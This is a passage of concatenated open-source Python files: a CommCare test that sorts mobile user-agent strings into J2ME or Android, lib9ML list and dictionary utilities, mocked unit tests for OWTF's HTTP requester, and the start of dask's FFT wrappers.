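# for any scalar cost f(W), would look roughly like this hypothetical helper
# (illustrative only, not pylearn2 API):
#
#   >>> import numpy as np
#   >>> def finite_diff_grad(f, W, eps=1e-4):
#   ...     g = np.zeros_like(W)
#   ...     for idx in np.ndindex(W.shape):
#   ...         Wp = W.copy(); Wp[idx] += eps
#   ...         Wm = W.copy(); Wm[idx] -= eps
#   ...         g[idx] = (f(Wp) - f(Wm)) / (2 * eps)
#   ...     return g
#
# Comparing finite_diff_grad(cost_fn, filters) against the analytic
# weights_grad is the standard way to validate a hand-written gradient op.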
| ml-lab/pylearn2 | pylearn2/sandbox/cuda_convnet/tests/test_weight_acts.py | Python | bsd-3-clause | 4,679 |
from django.test import SimpleTestCase
from corehq.apps.receiverwrapper.util import J2ME, guess_phone_type_from_user_agent, ANDROID
class TestPhoneType(SimpleTestCase):
def testJavaUserAgents(self):
corpus = [
# observed from c2 submission
'NokiaC2-01/5.0 (11.10) Profile/MIDP-2.1 Configuration/CLDC-1.1 Profile/MIDP-2.0 Configuration/CLDC-1.1',
# http://developer.nokia.com/community/wiki/User-Agent_headers_for_Nokia_devices
'Mozilla/5.0 (Series40; Nokia311/03.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.31',
'Mozilla/5.0 (Series40; NokiaX3-02/le6.32; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.2.62.10',
'Mozilla/5.0 (SymbianOS/9.1; U; [en-us]) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/5.0 (SymbianOS/9.1; U; [en]; SymbianOS/91 Series60/3.0) AppleWebkit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es61',
'Mozilla/5.0 (SymbianOS/9.1; U; [en]; Series60/3.0 NokiaE60/4.06.0) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'NokiaN73-2/3.0-630.0.2 Series60/3.0 Profile/MIDP-2.0 Configuration/CLDC-1.1',
'NokiaN73-2/2.0626 S60/3.0 Profile/MIDP-2.0 Configuration/CLDC-1.1',
'Mozilla/4.0 (compatible; MSIE 5.0; S60/3.0 NokiaN73-1/2.0(2.0617.0.0.7) Profile/MIDP-2.0 Configuration/CLDC-1.1)',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaXxx/1.0; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/5.0 (SymbianOS/9.3; U; Series60/3.2 NokiaE75-1/110.48.125 Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 Nokia5800d-1/21.0.025; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/12.0.024; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) BrowserNG/7.1.12344',
'NokiaN90-1/3.0545.5.1 Series60/2.8 Profile/MIDP-2.0 Configuration/CLDC-1.1',
'Nokia3200/1.0 (5.29) Profile/MIDP-1.0 Configuration/CLDC-1.0 UP.Link/6.3.1.13.0',
'NokiaN80-3/1.0552.0.7Series60/3.0Profile/MIDP-2.0Configuration/CLDC-1.1',
'Nokia7610/2.0 (5.0509.0) SymbianOS/7.0s Series60/2.1 Profile/MIDP-2.0 Configuration/CLDC-1.0',
'Nokia6600/1.0 (5.27.0) SymbianOS/7.0s Series60/2.0 Profile/MIDP-2.0 Configuration/CLDC-1',
'Nokia6680/1.0 (4.04.07) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1',
'Nokia6230/2.0+(04.43)+Profile/MIDP-2.0+Configuration/CLDC-1.1+UP.Link/6.3.0.0.0',
'Nokia6630/1.0 (2.3.129) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1',
'Nokia7600/2.0 (03.01) Profile/MIDP-1.0 Configuration/CLDC-1.0 (Google WAP Proxy/1.0)',
'NokiaN-Gage/1.0 SymbianOS/6.1 Series60/1.2 Profile/MIDP-1.0 Configuration/CLDC-1.0',
'Nokia5140/2.0 (3.10) Profile/MIDP-2.0 Configuration/CLDC-1.1',
'Nokia3510i/1.0 (04.44) Profile/MIDP-1.0 Configuration/CLDC-1.0',
'Nokia7250i/1.0 (3.22) Profile/MIDP-1.0 Configuration/CLDC-1.0',
'Nokia7250/1.0 (3.14) Profile/MIDP-1.0 Configuration/CLDC-1.0',
'Nokia6800/2.0 (4.17) Profile/MIDP-1.0 Configuration/CLDC-1.0 UP.Link/5.1.2.9',
'Nokia3650/1.0 SymbianOS/6.1 Series60/1.2 Profile/MIDP-1.0 Configuration/CLDC-1.0',
'Nokia8310/1.0 (05.11) UP.Link/6.5.0.0.06.5.0.0.06.5.0.0.06.5.0.0.0',
'Mozilla/5.0 (X11; U; Linux armv7l; en-GB; rv:1.9.2b6pre) Gecko/20100318 Firefox/3.5 Maemo Browser 1.7.4.7 RX-51 N900',
# http://www.zytrax.com/tech/web/mobile_ids.html
'Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 710)',
'Nokia2700c-2/2.0 (09.80) Profile/MIDP-2.1 Configuration/CLDC-1.1 UCWEB/2.0(Java; U; MIDP-2.0; en-US; nokia2700c-2) U2/1.0.0 UCBrowser/8.8.1.252 U2/1.0.0 Mobile',
'Nokia2760/2.0 (06.82) Profile/MIDP-2.1 Configuration/CLDC-1.1',
'Nokia2700c-2/2.0 (07.80) Profile/MIDP-2.1 Configuration/CLDC-1.1 nokia2700c-2/UC Browser7.7.1.88/69/444 UNTRUSTED/1.0',
'Opera/9.80 (J2ME/MIDP; Opera Mini/4.1.15082/22.414; U; en) Presto/2.5.25 Version/10.54',
'Nokia3120Classic/2.0 (06.20) Profile/MIDP-2.1 Configuration/CLDC-1.1',
'Opera/8.0.1 (J2ME/MIDP; Opera Mini/3.1.9427/1724; en; U; ssr)',
'Nokia3200/1.0 (5.29) Profile/MIDP-1.0 Configuration/CLDC-1.0 UP.Link/6.3.1.13.0',
'Nokia3510i/1.0 (04.44) Profile/MIDP-1.0 Configuration/CLDC-1.0',
'Nokia3650/1.0 SymbianOS/6.1 Series60/1.2 Profile/MIDP-1.0 Configuration/CLDC-1.0',
'Mozilla/4.0 (compatible; MSIE 4.0; SmartPhone; Symbian OS/1.1.0) Netfront/3.1',
'Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 Nokia5800d-1/60.0.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.33 Mobile Safari/533.4 3gpp-gba',
'Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 Nokia5230/40.0.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.4 3gpp-gba',
'Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 Nokia5800d-1/50.0.005; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.3',
'Nokia5130c-2/2.0 (07.97) Profile/MIDP-2.1 Configuration/CLDC-1.1 nokia5130c-2/UC Browser7.5.1.77/69/351 UNTRUSTED/1.0',
'Nokia5140/2.0 (3.10) Profile/MIDP-2.0 Configuration/CLDC-1.1',
'Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 Nokia5800d-1b/20.2.014; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Nokia6212 classic/2.0 (06.20) Profile/MIDP-2.1 Configuration/CLDC-1.1',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia6120c/3.83; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; Nokia 6680/5.04.07; 9399) Opera 8.65 [en]',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es61i',
'Nokia6230/2.0+(04.43)+Profile/MIDP-2.0+Configuration/CLDC-1.1+UP.Link/6.3.0.0.0',
'Nokia6630/1.0 (2.3.129) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1',
'Mozilla/4.1 (compatible; MSIE 5.0; Symbian OS; Nokia 6600;432) Opera 6.10 [en]',
'Nokia6600/1.0 (5.27.0) SymbianOS/7.0s Series60/2.0 Profile/MIDP-2.0 Configuration/CLDC-1',
'Nokia6680/1.0 (4.04.07) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1',
'Mozilla/4.1 (compatible; MSIE 5.0; Symbian OS; Nokia 6600;452) Opera 6.20 [en-US]',
'Nokia6800/2.0 (4.17) Profile/MIDP-1.0 Configuration/CLDC-1.0 UP.Link/5.1.2.9',
'Nokia7610/2.0 (7.0642.0) SymbianOS/7.0s Series60/2.1 Profile/MIDP-2.0 Configuration/CLDC-1.0/UC Browser7.9.1.120/27/351/UCWEB',
'Nokia7250I/1.0 (3.22) Profile/MIDP-1.0 Configuration/CLDC-1.0',
'Nokia7250/1.0 (3.14) Profile/MIDP-1.0 Configuration/CLDC-1.0',
'Nokia7610/2.0 (5.0509.0) SymbianOS/7.0s Series60/2.1 Profile/MIDP-2.0 Configuration/CLDC-1.0',
'Nokia8310/1.0 (05.11) UP.Link/6.5.0.0.06.5.0.0.06.5.0.0.06.5.0.0.0',
'Mozilla/4.0 (compatible; MSIE 5.0; Series80/2.0 Nokia9300/05.22 Profile/MIDP-2.0 Configuration/CLDC-1.1)',
'Mozilla/4.0 (compatible; MSIE 5.0; Series80/2.0 Nokia9500/4.51 Profile/MIDP-2.0 Configuration/CLDC-1.1)',
'NokiaC3-00/5.0 (04.60) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+',
'Mozilla/5.0 (SymbianOS/9.3; Series60/3.2 NokiaE55-1/034.001; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.1.5',
'Opera/9.80 (S60; SymbOS; Opera Mobi/499; U; en-GB) Presto/2.4.18 Version/10.00',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es61i',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.13918/488; U; en) Presto/2.2.0',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE63-3/100.21.110; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/07.24.0.3; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.2.3.18.0',
'Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13',
'NokiaN70-1/5.0737.3.0.1 Series60/2.8 Profile/MIDP-2.0 Configuration/CLDC-1.1/UC Browser7.8.0.95/27/352',
'Mozilla/5.0 (SymbianOS/9.3; U; Series60/3.2 NokiaN79-1/32.001; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/20.0.019; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) BrowserNG/7.1.18124',
'Mozilla/5.0 (SymbianOS/9.3; U; Series60/3.2 NokiaN85-1/31.002; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
# 'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1', # Alpha version of Mozilla Fennec (mobile Firefox) on Nokia N800.
'Mozilla/5.0 (X11; U; Linux armv7l; en-GB; rv:1.9.2a1pre) Gecko/20090928 Firefox/3.5 Maemo Browser 1.4.1.22 RX-51 N900',
# 'Mozilla/5.0 (X11; U; Linux armv6l; en-us) AppleWebKit/528.5+ (KHTML, like Gecko, Safari/528.5+) tear', # Tear 0.3 (Beta) on Nokia N800 under Mer
# 'Mozilla/5.0 (X11; U; Linux armv6l; en-us) AppleWebKit/528.5+ (KHTML, like Gecko, Safari/528.5+) midori', # Midori on Nokia n800 tablet device.
# 'Links (2.1pre31; Linux 2.6.21-omap1 armv6l; x)', # Links 2.1 preview 31 on a Nokia N800 tablet under OS2008
# 'Mozilla/5.0 (X11; U; Linux armv6l; en-US; rv: 1.9.1a2pre) Gecko/20080813221937 Prism/0.9.1', # Prism on a Nokia N800 tablet under OS2008
# 'Mozilla/5.0 (X11; U; Linux armv6l; en-US; rv:1.9a6pre) Gecko/20070810 Firefox/3.0a1 Tablet browser 0.1.16 RX-34_2007SE_4.2007.38-2', # Nokia N800 (Internet tablet) (v.20.0.015) running MicroB (a version of FF3) with embedded Flash 9 player
# 'Opera/9.50 (J2ME/MIDP; Opera Mini/4.1.10781/298; U; en)', # Nokia N95 (v.20.0.015) running Opera 9.50 MINI
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE71-1/100.07.76; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Opera/8.01 (J2ME/MIDP; Opera Mini/3.0.6306/1528; en; U; ssr)',
'Mozilla/4.0 (compatible; MSIE 6.0; ; Linux armv5tejl; U) Opera 8.02 [en_US] Maemo browser 0.4.31 N770/SU-18',
'NokiaN80-3/1.0552.0.7Series60/3.0Profile/MIDP-2.0Configuration/CLDC-1.1',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
# 'Mozilla/5.0 (X11; U; Linux armv6l; en-US; rv:1.9a6pre) Gecko/20070807 Firefox/3.0a1 Tablet browser 0.1.16 RX-34_2007SE_4.2007.26-8', # Firefox on Nokia N800 Tablet PC
'NokiaN90-1/3.0545.5.1 Series60/2.8 Profile/MIDP-2.0 Configuration/CLDC-1.1',
'NokiaN-Gage/1.0 SymbianOS/6.1 Series60/1.2 Profile/MIDP-1.0 Configuration/CLDC-1.0',
]
for java_agent in corpus:
self.assertEqual(J2ME, guess_phone_type_from_user_agent(java_agent), 'j2me user agent detection failed for {}'.format(java_agent))
def testAnroidUserAgents(self):
corpus = [
# http://www.zytrax.com/tech/web/mobile_ids.html
# android like things
'Mozilla/5.0 (Linux; Android 4.1.1; Transformer Prime TF201 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19',
'Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; Transformer TF101 Build/IMM76I) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30',
'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; VS840 4G Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
'Mozilla/5.0 (Linux; U; Android 2.2.1; en-us; MB525 Build/3.4.2-107_JDN-9) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
'Mozilla/5.0 (Linux; U; Android 2.1-update1-1.0.19; en-us; NXM736 Build/ECLAIR) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17',
'Mozilla/5.0 (Linux; U; Android 2.2; de-de; U0101HA Build/FRF85B) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
'Mozilla/5.0 (Linux; U; Android 2.2.1; de-de; SP-60 Build/MASTER) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
'Mozilla/5.0 (Linux; U; Android 2.2; en-gb; ViewPad7 Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
'Mozilla/5.0 (Linux; U; Android 2.1-2010.11.4; de-de; XST2 Build/ECLAIR) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17',
'Mozilla/5.0 (Linux; U; Android 1.0.3; de-de; A80KSC Build/ECLAIR) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17',
'Mozilla/5.0 (Linux; U; Android 2.2.1; en-au; eeepc Build/MASTER) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
'Mozilla/5.0 (Linux; U; Android 1.6; en-us; xpndr_ihome Build/DRD35) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1',
'Mozilla/5.0 (Linux; U; Android 2.2.1; fr-ch; A43 Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
'Mozilla/5.0 (Linux; U; Android 2.2.1; de-de; X2 Build/FRG83) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
]
for android_agent in corpus:
self.assertEqual(ANDROID, guess_phone_type_from_user_agent(android_agent), 'android user agent detection failed for {}'.format(android_agent))
def testDefaultIsAndroid(self):
for empty in [None, '']:
self.assertEqual(ANDROID, guess_phone_type_from_user_agent(empty))
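# Added illustrative sketch (this is NOT the corehq implementation, only a
# guess consistent with the expectations encoded in the tests above): a
# heuristic of this shape would classify both corpora correctly and default
# to ANDROID when no user agent is supplied.
#
#   def _guess_phone_type(user_agent):
#       if not user_agent:
#           return ANDROID
#       return ANDROID if 'Android' in user_agent else J2ME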
| puttarajubr/commcare-hq | corehq/apps/receiverwrapper/tests/test_guess_phone_type.py | Python | bsd-3-clause | 14,799 |
from __future__ import absolute_import
from builtins import zip
from past.builtins import basestring
import itertools
from functools import reduce
import collections
from operator import attrgetter
from .validation import assert_no_duplicates
from ..exceptions import NineMLUsageError
from nineml.base import ContainerObject
from logging import getLogger
logger = getLogger('NineML')
class OrderedDefaultListDict(collections.OrderedDict):
def __missing__(self, key):
self[key] = value = []
return value
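# Added usage sketch (not in the original module): behaves like
# defaultdict(list) but preserves the insertion order of keys.
#
#   >>> d = OrderedDefaultListDict()
#   >>> d['a'].append(1)
#   >>> d['b'].append(2)
#   >>> list(d.items())
#   [('a', [1]), ('b', [2])]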
def expect_single(lst, errmsg=None):
"""Retrieve a single element from an iterable.
This function tests whether an iterable contains just a single element and
if so returns that element. Otherwise it raises an Exception.
:param lst: An iterable
:rtype: the element in the list, ``lst[0]``, provided ``len(lst)==1``
>>> expect_single( ['hello'] )
'hello'
>>> expect_single( [1] )
1
>>> expect_single( [] ) #doctest: +SKIP
NineMLUsageError: expect_single() received an iterable of length: 0
>>> expect_single( [None,None] ) #doctest: +SKIP
NineMLUsageError: expect_single() received an iterable of length: 2
>>> expect_single( [], lambda: raise_exception( RuntimeError('Aggh') ) #doctest: +SKIP # @IgnorePep8
RuntimeError: Aggh
>>> #Slightly more tersly:
>>> expect_single( [], RuntimeError('Aggh') ) #doctest: +SKIP
RuntimeError: Aggh
"""
if isinstance(lst, basestring):
raise NineMLUsageError(
"A string rather than a list/tuple was provided to expect_single "
"({})".format(lst))
if not _is_iterable(lst):
raise NineMLUsageError('Object not iterable')
if issubclass(lst.__class__, (dict)):
err = "Dictionary passed to expect_single. This could be ambiguous"
err += "\nIf this is what you intended, please explicity pass '.keys' "
raise NineMLUsageError(err)
lst = list(lst)
# Good case:
if len(lst) == 1:
return lst[0]
if errmsg is None:
# Bad case: our list doesn't contain just one element
errmsg = 'expect_single() received an iterable of length: {}'.format(
    len(lst))
errmsg += '\n - List Contents:{}\n'.format(lst)
raise NineMLUsageError(errmsg)
def _filter(lst, func=None):
"""Filter a list according to a predicate.
Takes a sequence [o1,o2,..] and returns a list contains those which
are not `None` and satisfy the predicate `func(o)`
:param lst: Input iterable (not a dictionary)
:param func: Predicate function. If ``none``, this function always returns
``True``
Implementation::
if func:
return [ l for l in lst if l is not None and func(l) ]
else:
return [ l for l in lst if l is not None]
Examples:
>>> _filter( ['hello','world'] ) #doctest: +NORMALIZE_WHITESPACE
['hello', 'world']
>>> _filter( ['hello',None,'world'] ) #doctest: +NORMALIZE_WHITESPACE
['hello', 'world']
>>> _filter( [None,] ) #doctest: +NORMALIZE_WHITESPACE
[]
"""
if func:
return [l for l in lst if l is not None and func(l)]
else:
return [l for l in lst if l is not None]
def filter_expect_single(lst, func=None, errmsg=None):
"""Find a single element matching a predicate in a list.
This is a syntactic-sugar function ``_filter`` and ``expect_single``
in a single call.
Returns::
expect_single( _filter(lst, func))
This is useful when we want to find an item in a sequence with a
certain property, and expect there to be only one.
Examples:
>>> find_smith = lambda s: s.split()[-1] == 'Smith'
>>> filter_expect_single( ['John Smith','Tim Jones'], func=find_smith ) #doctest: +NORMALIZE_WHITESPACE
'John Smith'
"""
return expect_single(_filter(lst, func), errmsg)
def filter_by_type(lst, acceptedtype):
""" Find all the objects of a certain type in a list
This is a syntactic sugar function, which returns a list of all the
objects in a iterable for which ``isinstance(o,acceptedtype) == True``
and for which the objects are not ``None``. i.e::
filter_by_type([None], types.NoneType)
[]
"""
return _filter(lst, lambda x: isinstance(x, acceptedtype))
def filter_discrete_types(lst, acceptedtypes):
"""Creates a dictionary mapping types to objects of that type.
Starting with a list of object, and a list of types, this returns a
dictionary mapping each type to a list of objects of that type.
For example::
>>> import types
>>> filter_discrete_types( ['hello',1,2,'world'], ( basestring, types.IntType) ) #doctest: +NORMALIZE_WHITESPACE
{<type 'basestring'>: ['hello', 'world'], <type 'int'>: [1, 2]}
The function checks that each object is mapped to exactly one type
"""
res = dict([(a, []) for a in acceptedtypes])
for obj in lst:
obj_type = filter_expect_single(
acceptedtypes, lambda at: isinstance(obj, at),
errmsg='{} could not be mapped to a single type'.format(obj))
res[obj_type].append(obj)
return res
def invert_dictionary(dct):
"""Takes a dictionary mapping (keys => values) and returns a
new dictionary mapping (values => keys).
i.e. given a dictionary::
{k1:v1, k2:v2, k3:v3, ...}
it returns a dictionary::
{v1:k1, v2:k2, v3:k3, ...}
It checks to make sure that no values are duplicated before converting.
"""
for v in list(dct.values()):
if not _is_hashable(v):
err = "Can't invert a dictionary containing unhashable keys"
raise NineMLUsageError(err)
assert_no_duplicates(list(dct.values()))
return dict(list(zip(list(dct.values()), list(dct.keys()))))
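# Added example (not part of the original source):
#
#   >>> invert_dictionary({'a': 1, 'b': 2}) == {1: 'a', 2: 'b'}
#   True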
def flatten_first_level(nested_list):
"""Flattens the first level of an iterable, i.e.
>>> flatten_first_level( [ ['This','is'],['a','short'],['phrase'] ] ) #doctest: +NORMALIZE_WHITESPACE
['This', 'is', 'a', 'short', 'phrase']
>>> flatten_first_level( [ [1,2],[3,4,5],[6] ] ) #doctest: +NORMALIZE_WHITESPACE
[1,2,3,4,5,6]
"""
if isinstance(nested_list, basestring):
err = "Shouldn't pass a string to flatten_first_level."
err += "Use list(str) instead"
raise NineMLUsageError(err)
if not _is_iterable(nested_list):
err = 'flatten_first_level() expects an iterable'
raise NineMLUsageError(err)
for nl in nested_list:
if not _is_iterable(nl) or isinstance(nl, basestring):
raise NineMLUsageError(
"flatten_first_level() expects all arguments to be iterable "
"and not strings ({})".format(nested_list))
return list(itertools.chain(*nested_list))
def safe_dictionary_merge(dictionaries):
"""Safely merge multiple dictionaries into one
Merges an iterable of dictionaries into a new single dictionary,
checking that there are no key collisions
>>> safe_dictionary_merge( [ {1:'One',2:'Two'},{3:'Three'} ] ) #doctest: +NORMALIZE_WHITESPACE
{1: 'One', 2: 'Two', 3: 'Three'}
>>> safe_dictionary_merge( [ {1:'One',2:'Two'},{3:'Three',1:'One'} ] ) #doctest: +NORMALIZE_WHITESPACE +IGNORE_EXCEPTION_DETAIL +SKIP
NineMLUsageError: Key collision while merging dictionaries
"""
kv_pairs = list(itertools.chain(*[iter(d.items()) for d in dictionaries]))
keys, _ = list(zip(*kv_pairs))
assert_no_duplicates(keys, 'Key collision while merging dictionaries')
return dict(kv_pairs)
def _is_iterable(obj):
return hasattr(obj, '__iter__')
def _is_hashable(obj):
try:
hash(obj)
return True
except:
return False
def unique_by_id(lst):
"""
Gets a list of unique 9ML objects using their 'id' property. Similar to a
set but can handle temporary objects as well.
Typically used in unittests.
"""
id_map = {}
for obj in lst:
id_map[obj.id] = obj
return sorted(id_map.values(), key=attrgetter('sort_key'))
def unique_by_eq(lst):
return reduce(lambda l, x: l.append(x) or l if x not in l else l, lst, [])
def ensure_iterable(expected_list):
if isinstance(expected_list, dict):
raise TypeError("Expected a list, got a dictionary ({})"
.format(expected_list))
elif isinstance(expected_list, (basestring, ContainerObject)):
lst = [expected_list]
elif isinstance(expected_list, collections.Iterable): # @UndefinedVariable
lst = list(expected_list)
else:
lst = [expected_list]
return lst
def normalise_parameter_as_list(param):
return ensure_iterable(none_to_empty_list(param))
def none_to_empty_list(obj):
if obj is None:
return []
else:
return obj
def safe_dict(vals):
""" Create a dict, like dict(), but ensure no duplicate keys are given!
[Python silently allows dict([(1, True), (1, None)]) !!]"""
d = {}
for k, v in vals:
if k in d:
err = 'safe_dict() failed with duplicated keys: %s' % k
raise NineMLUsageError(err)
d[k] = v
if len(vals) != len(d):
raise NineMLUsageError('Duplicate keys given')
return d
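# Added usage sketch (not part of the original module):
#
#   >>> safe_dict([(1, 'one'), (2, 'two')])
#   {1: 'one', 2: 'two'}
#   >>> safe_dict([(1, 'one'), (1, 'uno')])   # doctest: +SKIP
#   NineMLUsageError: safe_dict() failed with duplicated keys: 1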
| INCF/lib9ML | nineml/utils/iterables.py | Python | bsd-3-clause | 9,425 |
from tests.testing_framework.base_test_cases import BaseTestCase
from hamcrest import *
from flexmock import flexmock
from framework.http.requester import Requester
import re
class RequesterTests(BaseTestCase):
def before(self):
self.core_mock = flexmock()
self.core_mock.Config = flexmock()
self.core_mock.Config.should_receive("Get").and_return("user agent")
self.requester = Requester(self.core_mock, None)
flexmock(self.requester)
def test_Request_should_be_successful(self):
url = "http://someurl"
self.requester.should_receive("perform_request").once().ordered()
self.requester.should_receive("set_succesful_transaction").once().ordered()
self.requester.should_receive("log_transaction").once().ordered()
self.core_mock.should_receive("IsInScopeURL").and_return(True).once()
self.core_mock.Timer = flexmock()
self.core_mock.Timer.should_receive("StartTimer").once()
self.requester.Request(url)
def test_StringToDict(self):
params = "key=value"
result = self.requester.StringToDict(params)
assert_that(result["key"], is_("value"))
def test_ProcessHTTPErrorCode_with_connection_refused(self):
error = flexmock()
error.reason = "[Errno 111]"
error_output = self.requester.ProcessHTTPErrorCode(error, "someurl")
assert_that(error_output, contains_string("was refused"))
def test_ProcessHTTPErrorCode_with_unknown_error(self):
error = flexmock()
error.reason = "unkwown error"
error_output = self.requester.ProcessHTTPErrorCode(error, "someurl")
assert_that(error_output, contains_string("unknown error"))
def test_ProcessHTTPErrorCode_with_hostname_resolving_error(self):
error = flexmock()
error.reason = "[Errno -2]"
self.core_mock.Error = flexmock()
expected_arg = re.compile(".*cannot resolve hostname.*")
self.core_mock.Error.should_receive("FrameworkAbort").with_args(expected_arg)
error_output = self.requester.ProcessHTTPErrorCode(error, "someurl")
def test_ProxyCheck_with_no_proxy_settings_is_ok(self):
assert_that(self.requester.ProxyCheck()[0], is_(True))
def test_ProxyCheck_with_proxy_should_be_succesful(self):
flexmock(self.requester)
self.requester.should_receive("is_request_possible").and_return(True).once()
self.requester.should_receive("is_transaction_already_added").and_return(False).once()
self.requester.should_receive("GET").once()
self.core_mock.Config.should_receive("Get").with_args("PROXY_CHECK_URL").once()
self.requester.Proxy = flexmock()
assert_that(self.requester.ProxyCheck()[0], is_(True))
| sharad1126/owtf | tests/test_cases/framework/http/requester_tests.py | Python | bsd-3-clause | 2,784 |
from __future__ import absolute_import, division, print_function
from functools import partial
import numpy as np
import numpy.fft as npfft
from .core import map_blocks
chunk_error = ("Dask array only supports taking an FFT along an axis that \n"
"has a single chunk. An FFT operation was tried on axis %s \n"
"which has chunks %s. To change the array's chunks use "
"dask.Array.rechunk.")
fft_preamble = """
Wrapping of numpy.fft.%s
The axis along which the FFT is applied must have only one chunk. To change
the array's chunking use dask.Array.rechunk.
The numpy.fft.%s docstring follows below:
"""
def _fft_wrap(fft_func, dtype, out_chunk_fn):
def func(a, n=None, axis=-1):
if len(a.chunks[axis]) != 1:
raise ValueError(chunk_error % (axis, a.chunks[axis]))
chunks = out_chunk_fn(a, n, axis)
return map_blocks(partial(fft_func, n=n, axis=axis), a, dtype=dtype,
chunks=chunks)
np_name = fft_func.__name__
func.__doc__ = (fft_preamble % (np_name, np_name)) + fft_func.__doc__
func.__name__ = np_name
return func
def _fft_out_chunks(a, n, axis):
""" For computing the output chunks of fft and ifft"""
if n is None:
return a.chunks
chunks = list(a.chunks)
chunks[axis] = (n,)
return chunks
def _rfft_out_chunks(a, n, axis):
if n is None:
n = a.chunks[axis][0]
chunks = list(a.chunks)
